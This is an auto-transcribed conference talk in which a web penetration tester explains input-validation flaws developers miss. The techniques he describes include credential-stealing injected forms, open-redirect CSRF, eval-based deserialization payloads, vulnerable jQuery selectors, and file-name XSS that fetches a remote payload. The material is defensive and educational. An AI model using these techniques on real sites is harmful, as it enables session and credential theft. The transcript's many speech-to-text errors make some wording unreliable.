Forgotten Inputs: Finding Web App Flaws By Understanding The Dev's Mind

the besides DC 2017 videos are brought to you by threat quotient introducing the industry's first threat intelligence platform designed to enable threat operations and management and data tribe a new kind of startup studio Co building the next generation of commercial cyber security analytics and big data product companies hi everybody welcome back everybody have a good lunch awesome I full disclosure I'm a super nervous speaker so I haven't actually had lunch yet because it would be over there right now it's also the first time I've ever been given a raised platform so hopefully I don't fall off but that'll be good so the advice I've sort of been given and I've been kind of working on my my kind

of speaking thing over the last little while the the advice I've been given by the guys that do it more that I work with is always open with a joke and usually it's something like why wasn't Walmart hacked because it's not a target right [Applause] but it's been a while since the target hack and it's less relevant so I came up with something new I think we'll see your my test audience

so directly from their privacy policy and that was there as of at least yesterday still so I didn't check today

all right I hate talking about myself but I'm gonna do it for a little bit anyway so I'm a senior security consultant that secure ideas I come from a dev background originally I started slinging code kind of in the late 80s when I was very young progressed into some procedural programming and then around 97 I started sticking websites up on the Internet and I think starting with geo cities and just kind of grew from there I did 10 years ish professionally as a as a web app developer and five as a system integration consultant so I've got a pretty good handle on kind of a dev mindset and how they think and what factors influence them I've got a kind

of reputation among my peers for no dangerous isn't really the right word more playful but for kind of weaving my cross-site scripting payloads into the applications that have the injection flaws rather than breaking the application and by coming out of that way you can do some really kind of fun and interesting stuff like hijacking they're there Ajax methods so that everything works as usual but I also get a copy of the requests and responses on my server that sort of thing one of my favorite parts of my job well first of all what do I do most of what I do is well most of what I do is penetration testing and writing the reports for the penetration tests so

there's a good part in a bad part obviously right there nobody likes reports in terms of what I test it's it's kind of everything I do a lot of applications because of my background but I also do a internal external networks along with with the rest of my team kind of we're a small consultancy so everybody has to do some of everything and everybody's expected to develop that generalist skill set now as a developer I was kind of a generalist anyway because although I often had full-stack responsibilities I also hop back and forth between dotnet and Java I didn't really take a side and that's probably where some of the JavaScript came from it was the constant and all of that you

know while I don't like writing the pen test reports because nobody does it's it's not the fun part of the job but it is the deliverable what I do like is looking at the different flaws and seeing well how can these fit together to augment each other right what sort of unique opportunities can I create by using not one flaw but two or three or four combined I've got my we'll move on to the actual topic really soon I've got my at my Twitter and email up there and feel free to take out your phone take a picture I don't you could follow me if you want if you have a question afterwards if you're thinking Wednesday comes around

the next week and you're thinking about a web app thing and feel free to shoot me a question I don't mind and same you can send me a direct message on Twitter I I really I genuinely like helping people so although I if if I'm on site with a client I might not have time to respond within you know an hour or a few minutes I both definitely try to answer any questions that I get okay that's enough about me she move on yeah so what am I talking about with forgotten inputs that the title of the presentation that is right right yeah okay so mostly flaws around missing or insufficient input validation so go back to cross-site scripting a little

bit maybe yeah and it's not always injection but injection is a common use of this so it's there is somewhere that I'm sticking some sort of input and usually usually in a record request that then gets executed and in terms of a JavaScript event on the page or just a direct script injection is that dangerous did people debate that a little bit I would say definitely a resounding yes examples of the things I can do with it potentially steel steel sessions steel data that's going in and being exchanged with the server which it's more likely to be kind of in a persistent state even if it's not stored in the database now my script if I've executed it on a

single page app until somebody navigates away that's you know the damage is done I could fake a session time Mountain convinced you to log back in on a form that looks like the right one and is actually hosted on the right domain but sends credentials to me and then shows you your app back just like you logged back in I could prompt you to install a browser plug-in now to be fair if it's in the Chrome Web Store there is a degree of code review on that but I could probably also social engineer somebody into turning on developer mode and installing it from a plugin unsafely I mean if you look at look at Facebook

right now well not right now right now but you know today at any point you go to Facebook pop open the developer tools in your browser if you don't know where they are find them because it's good to know where they're pop them up and from while you're on Facebook and you get a big warning because people were successfully convinced to pop open the developer tools and copy and paste a cross-site scripting payload I guess kind of into their own browser if they attack them themselves basically so it was a big enough issue that they they had to put a great big warning in there on Facebook they actually big red letters don't pay stuff in here if you

don't know what you're doing so this is where yeah it's important to safeguard anything that is user input and developers the dumb do I have any developers in the room I'm not gonna insult you anyway I got a few I not a small number I dumped the the if it's supposed to be user input they will almost always safeguard it pretty well on newer applications some of the legacy ones not so much what they in my experience and I at on a large scale with what they're not good at a lot of them are not trained in security at all there were security issues to just I did I did work with trading systems that

were doing you know one hundred hundreds and millions of dollars in transactions a day maybe billions in some cases never had secure coding training provided you know I had an anti money laundering training provided all the time but not anything about dealing with code flaws and so sometimes there were gaps in knowledge that cause mistakes but that's not really what we're focused on with this talk mainly what I'm focused on is the sort of stuff that just gets overlooked and a lot of that is down to deadlines pressure you know that sort of need to push things forward to get it within the sprint or hit a certain milestone in a waterfall project of anybody does those anymore and then we

that causes things to not be as throws they could be and even if you have a dedicated QA department there are certain things that they usually don't test they're not trained to look for them so for the most part it's stuff that is not the fields on the form you know those are user input for sure their values in a lot of cases that you're setting encode some well somewhere you're not expecting the user to touch or rather the developer is it's funny I actually have a lot more developers in this room the last time I did a version of this talk it was aimed at developers specifically and I had like two developers in a room this size yeah so

it's stuck yeah hidden fields for example that the HTML inputs that are type hidden' they're not there for the user but the user has access to them and and either through playing with them in the dev tools and the browser maybe writing script on the console or using the man-in-the-middle proxy if you're doing a pen test usually those can be manipulated so they're not actually necessarily safe but often the validation on them can be forgotten the parameters in the URL and and and that's not limited to the query string and we'll talk about some of the other types of parameters that can be in the URL kind of this sort of the first thing up

but that's that's an example this is an area whether they're a variety of things the user has some control over the last one actually is often kind of inputs but not user selected values we're perceived limitations of this broad term that I used for it but so you had something like a select list right you're either picking an item from a list or drop-down and you're presented a list of human-friendly values and behind that they're a list of ID's kind of attached as well that the actual values that gets sent when the form gets submitted a lot of times people don't think with their applications about making sure they'll they'll test in some cases that

I was expecting a state let's make sure it's one of my states sometimes but if they forget that they've probably also forgotten well somebody just changed the value to an injection of some kind in is attempting an injection a file names are another one in file names are on this list probably the highest success percentage if I have a place where I can upload a file in an application and it gets displayed to I mean from the standpoint of an attack perspective probably another user would be more relevant I mean I would say certainly greater than fifty percent of the time there's an injection flaw there using some really creative file names so I'm gonna that's actually gonna be probably

my last example because I think it's the it's my favorite one to finish on no but let's move ahead into the into into the address bar and move from there before I get to that so I worked a project at one point as an integration project I came into it laced a lot of the development was done but I was doing a lot of performance testing and this is about to become relevant to the next slide but not really to the topic but it's a fun one to talk about this was in a bank yeah big clergy kind of conservative organization they're important but they're not agile so I'm gonna doing these performance tests and generating

charts and they liked that and it didn't really matter that we had basically performance tested optimized and didn't need to do any more four months four months I was just asked to go back do some more testing add some more charts update the report so that I could go to the higher-ups because they like pictures so I included some pictures today there's there's no it's an arbitrary division that I kind of made up in my head there's no statistic this statistical support for this but we call that evidence that is anecdotal yeah it's kind of anecdotal so the areas of concern when you know you have an input field you you know the biggest thing is

does it work the way it's supposed to do when people do what they're supposed to do right because that's is this the real task you've been given gracefully failing with bad input is important too like if somebody were to make an error and I've given the green sliver I put theirs is you know it is a reasonable amount of effort goes into probably in in a lot of cases into into treating input as hostile or potentially hostile at least in a web application as soon as it's supposed to be coming from a trusted source the whole thing kind of shifts on you because it's coming from your own database and API you control it's coming from somewhere where

theoretically the work has been done and I think those are places where I just haven't seen I haven't seen the same amount of attention to well it could be a bad value because it shouldn't be a bad value it could be a hostile value well there's no reason hostile data should be coming in from over there but that's kind of kind of the way it seems to be and again there's actually there's a reason there's no actual unit of measurement labeled here as well because I don't I don't know what the appropriate one would be yeah thoughts per minute maybe I don't know simoom what is user input also I just pulled this off the internet I don't I

don't know that University or anything like that just disclaimer but yeah so it's sort of an example though a relevant relevant example you got these fields that definitely are coming from somebody who is filled out to submit the form right the organization code the org name the amount of money a big text field for description some signatures and then you get in the corner here you have this this office use only section right and what's the input control on that it's a person right a person looks at it but it is part of the form and anybody feeling that the form could also check and prove approved right the day then make up some initials and and and

submit it somewhere other than the person checking it there's no reason to think that would get caught and when as a web application it's not a person checking every request that comes in right it's it's the actual technological controls also if this was being submitted and then digitized somewhere I could write something on the top or on the side and it would take no time at all for people to not remember where it came from or who wrote it there so moving up to the address Brett kind of getting back on topic a little bit so there's a bunch of stuff it tends to get some attention there's I would say I see problems in the address

bar less often than I do Injection flaws and file names for example but it does get forgotten sometimes or it'll be an otherwise secure app with one thing not quite right mainly three kinds of input that you see not not counting the HTTP method it's not actually in the in the bar so you got the query string which I think I'm probably in a room full of people that all know what the query string is but I'm gonna say it anyway so in this example the go-to equals slash profile it's the the parameters for the get request that come after the question mark or usually it's a good request that uses them they're wrote parameters so when you see something

that is taped my domain slash users slash 42 and it pulls that user's profile or whatever that that would be an example probably have a route parameter and again probably the number of developers and they're in in the room probably most people know how that works but it's going to a routing function and behind the scenes or work class that goes okay this is going to the route users with an ID attached and it extracts that ID and uses it as a parameter it's a part of the the framework on the server side or it can happen on the client side as well which is part of what brings us to the next one the hash or anchor because you got

the URL this is a sort of a in a way I holdover from earlier kind of Internet where often it was it was a big document with very little formatting requests at that point in time were a bottleneck so you didn't want to do any more than you had to so you would have links around between spots within the same document that's what that was used for so the URL hash at the end of it and there'll be an example of that in a bit to hash at the end of it and then it was the name of the element that you wanted to basically move to in the browser but now that's often used in client-side routing like

if somebody's doing angular or I think what most of the popular new frameworks have a router available you don't have to use them and it's often an optional plugin but so that same concept of route parameters can also apply client-side now and it would be whatever the endpoint is hash syntax can change a little bit with Slash the client-side portion of the route that's being handled on the client-side the that is actually being used to trigger API calls then you're probably better off attacking the API directly and that's often the case so one example one one and it's sort of it doesn't have to be a problem is not always a problem but it's often a

symptom that there is something to exploit is just seeing a path in there as a parameter it could be fine a common place to see this sort of thing is in the situation where you request a resource and it goes you're not authenticated you know in a recession redirect you to the login page and then when you login usually on the login page you'll have a parameter like this when you log in it sends you back to the resource you originally requested that's how it does it so I mean if you're seeing it used for a redirect obviously one of the first things you want to try is well can i redirect it to a different site can i redirect somebody

elsewhere which might not seem like a huge deal but it can be really useful in combination with other flaws now can I get a really quick kind of show of hands who would feel comfortable explaining to somebody today right now how cross-site request forgery works as kind of what I thought it was it's really pretty simple if you were logged in to I'm gonna pick I'm gonna pick on Facebook for no particular reason as far as I know they don't have such a flaw I'm going to pick on Facebook you log into Facebook they as far as I can remember there's still cookie based sessions they give you cookie okay cool you go over to my tab open the

link that I sent you it takes you to a page that that I set up on my own server and that page submits a request of some kind you're not probably thinking like Ajax in this case because there are more controls around that but a simple post to your site your browser attached is your cookie to that sends it off to Facebook where I posted it and if that's a status update request then it's basically using your credentials to do a status updating because that cookie was included it was never shown to me but it was still sent from your browser so going back to the URL thing I need you to be logged into your site you noted to

this application that's vulnerable to cross-site request forgery for it to work what a way I can do that if this sort of flaw is present is to send you a link that goes to your login page with this parameter specified as pointing to my page you'll go to the site you know and trust you'll be presented with a login page you'll log in it will redirect to my page this is if it's an open redirect which is a flaw you'll arrive at my page with a brand new session and you're vulnerable app which I give Vinick exploits with cross-site request forgery another particularly interesting one I saw on a test probably six months ago was it wasn't doing anything in my

browser that I could see but there was a URL up there and it didn't seem to reject the absolute paths with with a full protocol and domain so I directed it at a site that I controlled and I got a request on that server and I got a JSON parsing response in the application if it was specifying an API to call within this organization they were specifying one of their own API so they controlled on a different server through this but as an Asst hacker I could specify my own server and then the API call was coming to me instead of them you know that doesn't give me anything it doesn't give me any data what it does

do if I had in this case I did if they're detailed enough error messages that you can figure out what structure was looking for is you basically I built up a JSON file that was what I was pointing at hard-coded response which then introduced my input into a context that was supposed to be coming from their API so as far as their app was concerned it was trustworthy is getting around safeguards right because they trust data coming from their API a reflection is another thing to always check for when there's really any kind of input so quickly reflection basically if I put it in there does it get written into the document body somewhere because

if it does and it gets done in an unsafe way and that's that's a critical part of it usually we're talking about concatenation that's the most kind of common unsafe way but often when you see something injecting through inner HTML that the dot inner HTML method on a Dom object that's potentially subject to it it doesn't doesn't get reflect doesn't get written into the document body could i potentially use it to write my own stuff into the document body security controls for for this and I think it's important to talk about the security controls part of its you know if I'm working with somebody I want to be able to not just break their stuff but tell

them how to change it but also we thought if I'm working on an attack I need to be able to recognize whether their controls look like they're implemented right and that can save me a lot of time not banging on something that I can tell is definitely implemented right in some cases maybe they've gone and done something a little bit they've tried to be too clever sometimes that happens I know I was guilty of it as a developer to tried to be too clever did something different and and there's a flaw in the implementation that can be exploited as well there's one more case that I've seen that was interesting with a URL in the URL or path in the URL and this is

in a an open source project product life Liferay portal Community Edition it's not the current version it is known vulnerability that they publish on their website so I'm not not doing anything irresponsible here but it had it supported a parameter where you could override this this content and delivery network it was using by supplying URL all of a sudden the static asset request for the JavaScript and CSS all get pointed at whatever host you specified which basically is site wide cross-site scripting right because you download all the scripts they're supposed to have edit them how you want to stick them up on your content and a little delivery now we're on your server pointed out

that I haven't said I think I got ahead of myself and assumed a little bit when you're exploiting cross-site scripting flaw that is not persisted in a database or some sort of storage there is a social engineering element there always is right it's it's generally a crafted link that you're sending to somebody to get them to click this one there's really hard to read right I'll fix that that's basically what it looks like so is anybody familiar with psychotic yeah the privileged access management solution is sort of like a LastPass style password store for enterprise so their current major version is is ten point something back in nine point something they had this exact issue they

had a structure in an encoded structure in the URL on some of the pages the security company mind you that I mean it was essentially it was intended to be a JSON object but they were I didn't actually pick apart their client-side code to find out how they were doing it wrong but the effect is is as if they were passing it into an eval function and the important distinction there as when you use the the JSON object in your browser's API do json.parse if somebody tries to include a function in the object that'll throw a parse exception won't get executed you take the same thing a string right string representation of the same object

and pass it into eval that function gets created so that is an example of unsafe deserialization now have a I should say there are a few live demos I kind of wanted to have live demos for everything but some of them don't really look as good as the canned ones to be to be honest for the file one at the end I definitely have a live demo you're gonna like that one so unsafety serialization so first of all this is effectively what was happening and it's not the only place I've seen that flaw is just a particularly noteworthy place to see that flaw so this is a straight straight out of the browser's console probably

Chrome I don't know I've changed browsers a few times or use all of them so decode URI there to change it to a string representation and then I use this eval station that assigned it to something and eval dit and then you can see the object got created and it's an array with objects that have names and types right and then like you might use if you were dynamically defining a table structure or something [Music] this is I'm going to show you two different sort of exploits on hopefully you can kind of see them do I have yeah I have an arrow so well I'll show you two ways usually the second way is going

to be the better way but let's look at this one first so instead of assigning a type of string so you know Jason's kind of key value pairs instead of assigning a type of string I've assigned an object I have named it evil object for no particular reason other than to highlight that it's an evil object I've given it this two string function with a console.log statement in it and return the string string and then closed off the object so you can see the eval runs the object gets created if I access that type field I get back this object it has a name of evil evil object it's the same thing but if I compare it to a string

well in this case I used the the triple equals which quick quick two-second JavaScript primer difference between three equals signs and two miss with three equal signs the types have to match or it's automatically a fail it won't try to do any coercion and that's why this worked the way it did that returns a false because it's comparing the string string to this object that's just above that but the next one using the double equals sign it's comparing the same two things but it goes while I'm comparing against the string so I'm gonna call the two string function to get the string representation of that object so that I can compare it watch your two string function in this case is

my payload so as soon as it does that comparison that you can see the XSS logged out there from the execution and it evaluates to a type of true because it's returned that string string to compare to the other string string that's kind of confusing when I say it out loud the case where you might favor this over the next one is probably when you're actually trying to delay execution but if you want to execute right away you've got another option and and a pretty good one the syntax I'll draw your attention to it but essentially a GEB javascript has a self executing anonymous function syntax is I guess sort of the technical term for it as it's usually used for

closures in this case you see it it's got the same function as before but it's actually what I've assigned to the type of the type parts kind of cut off a little bit but trust me it is so what I've done is I've wrapped that function in another set of parentheses and then followed it with this additional set of parentheses and that means when that function is defined it is also called right away and I could actually pass parameters into it through the second set of parentheses if I wanted to in this case I didn't so as soon as the eval happens and it needs to get assigned to that type I guess property that execution happens that string value

gets returned that's what actually gets assigned to the type and you can see down here when the objects expanded that's that's it right there so if I know what value was supposed to go in there I can make sure that value still goes in there it just goes in there after my code gets executed [Music] they sound like they're having a lot of fun next door don't they all right now we can't get out of the address bar what they were talking about jQuery let's have a little talk about jQuery this is stuff that is old this is stuff that is supposed to be patched but nobody updates the JavaScript so we still see it in the wild all the time location dot

hash is one so this is JavaScript selector around or jQuery prior to me selector around location dot hash which is I talked about it earlier the hash part of the URL now does anybody remember what what a hash means in jQuery syntax Jake jQuery selector syntax four by the ID that's right so yeah it's it's using that selector to select that of the element by D's is is how that would be intended to be used and cases where you where I've seen that done are like there's a jQuery plugin for doing a tabbed interface where you can link to specific tabs and so it uses uses the hash to specify which tab to display but

there was a flaw and this was in the one dot series that was up until wool 1.6.2 which is like I want to say 2010 it was actually it wasn't reason it's just still out there but this this bit of HTML would end up getting created in the document when it runs just a mishandling of input the funny thing about it is it will yes it was patched in one point six point three but anybody using jQuery migrated and production has potentially reintroduced the flaw it's it is a matter of opinion but I would say use jQuery migrate to move up update your jQuery don't leave it running in production it's sort of a shim but if

there's a development version of it this is kind of random background I guess there's a development version of it that alerts of errors and helps you fix the break and changes that's probably what people should be doing but yeah they don't always do what they should that's the one that is most likely to be a address bar related thing but if I'm gonna mention jQuery flaws I should mention the other two big ones which are in a few versions beyond that there was the one with the the class selector so any case where it was concatenated input with that with a dot at the front to select elements of a particular class and it's basically the same kind of

thing you put in a space you put it in an HTML element it creates the HTML if anybody has been hanging around Oh ASP looking at the cross scripting list by the way is going to recognize that payload because it's it's it's an arsenic classic you can also by the way omit the quotation marks completely if you want to do an alert with a number on that one but I like this better the other thing that that was going for awhile and into several the to dot jQuery versions as well which does not mean it's in the newest one jQuery versions it's confusing a little bit that way but so the get shortcut for doing an asynchronous HTTP

GET if it had a content type of text JavaScript it would get executed right away to issue that request in the first place you usually you're gonna need to have some kind of injection flaw anyway it just makes it easier to load a payload there are exceptions though to that every so often somebody is going to write an application that lets the user supply an arbitrary URL and goes and fetches it I think and I think it does it safely but the swagger if anyone's familiar with that it's API tool for essentially specifying api's documentation generating SDKs and well fun stuff with apos it's got an address bar a bar and in the top of the

application where you can put in a URL of a JSON spec to pull into it now as far as any version of it that I've seen it's not vulnerable to this kind of flaw but it is an example of that kind of that kind of use of being able to take an arbitrary URL okay hidden inputs we're gonna have to pick up the pace here a little bit hidden inputs so hidden inputs yes we talked about them they don't get enough attention there's one thing that is especially interesting about them so usually they're set on the server if there's any kind of server-side templating or inlining with with something like PHP or classic ASP but

sometimes it also gets reflected from somewhere or the JavaScript pulls from a get parameter and stuffs into the value attribute so looking at this one considering this we have a login form it's got a post it's got user name password there's a hidden at the top there that I've said is injectable just arbitrarily made that up there some way of injecting in that now obviously we could inject a script if it's injectable we could we could break context and inject a script like usual but let's pretend for a second that they using content security policy so I can't get script execution what are my other options here anybody see it no it closed their form and then I

opened my own new form content security policy will allow it and I can post their credentials to my own server all right whoo we're gonna make it okay fun with filenames so this is a list of some files I have in a directory they're fun to upload they're actually most of the image ones are pictures of my boss let's just get his face into the reports as much as possible he doesn't like seeing his face in reports and I'm just kind of a jerk and a bad employee so yeah so there are those I'm gonna jump over to the actual live demo of that because that's more fun and it's not gonna work from within presentation

modes we're gonna pop at a presentation mode hopefully it's at work come on come on come on come on come on come on haha alright there we go okay so first of all since we're here man low-resolution makes a trick here okay I'm gonna get I'm gonna give this a shot and see if I can do it right and rather we go in real time and that is the jQuery one oh that was really fast sorry I'll show you again there you can see it there's a there's a hash I did this image it's the exact same one that was in the slide all right let's move on to the file one because that one I think

is more fun hopefully I can find the right file there we go see there's Kevin Kevin by the way because I didn't say it earlier he's he's pretty well-known he's was a was a sans instructor he wrote the web pentesting in advanced web pen testing courses for them originally there we go and to a payload from a malicious server yeah that's right I forgot to mention that so this one it wasn't didn't just do an alert that was in lines there no no no this one fetched a payload from another server I was running and I'll show you that request in a second and pulled it in and executed it why did it happen twice anybody know any guesses

because I used the vulnerable jQuery get so here we go that guy's a little hard to see you can see it's kind of the rendering is a little messed up but if you can see the bottom window there's a great big touch command my cursors at the end of it and the rest of the stuff is kind of an artifact that's the filename that's where I created it a couple hours ago that what's going on here well what's a hard character to get into a file name forward slashes right forward slash is kind of kind of screw you if you're doing anything that involves absolute paths with protocols at the front or most URLs really so I stole the one off

of the you see right here just kind of wraps the document dot location dot href which on the page where it executed is is is this part is this that's the URL so I stole one of these slashes by sub stringing it out and then used it in my get request to actually write my url then you can see is got well 1415 here is the get request coming into the server now it is running on on a port on localhost it's localhost eight eight eight seven as long as the cores policy is set there's no reason you can't do this across servers across different hosts I just did not want to rely on an

internet connection in a conference center at a hacker conference because there's a bad idea so that is then my last kind of example to do really don't don't try to connect to the server that sucks I think it grumpy now there we go uh-huh there we so we got like three minutes but I'll be around afterwards I'm going to be floating around I'll practically probably be in here for the next talk but then I'll be around after that in a black t-shirt I won't be wearing the same shirt so look for a black t-shirt with a red circle with a devil in it you know always ask me questions then but we do have a couple

minutes if anybody has a question now yeah I never get oh I don't get a lot of questions thank you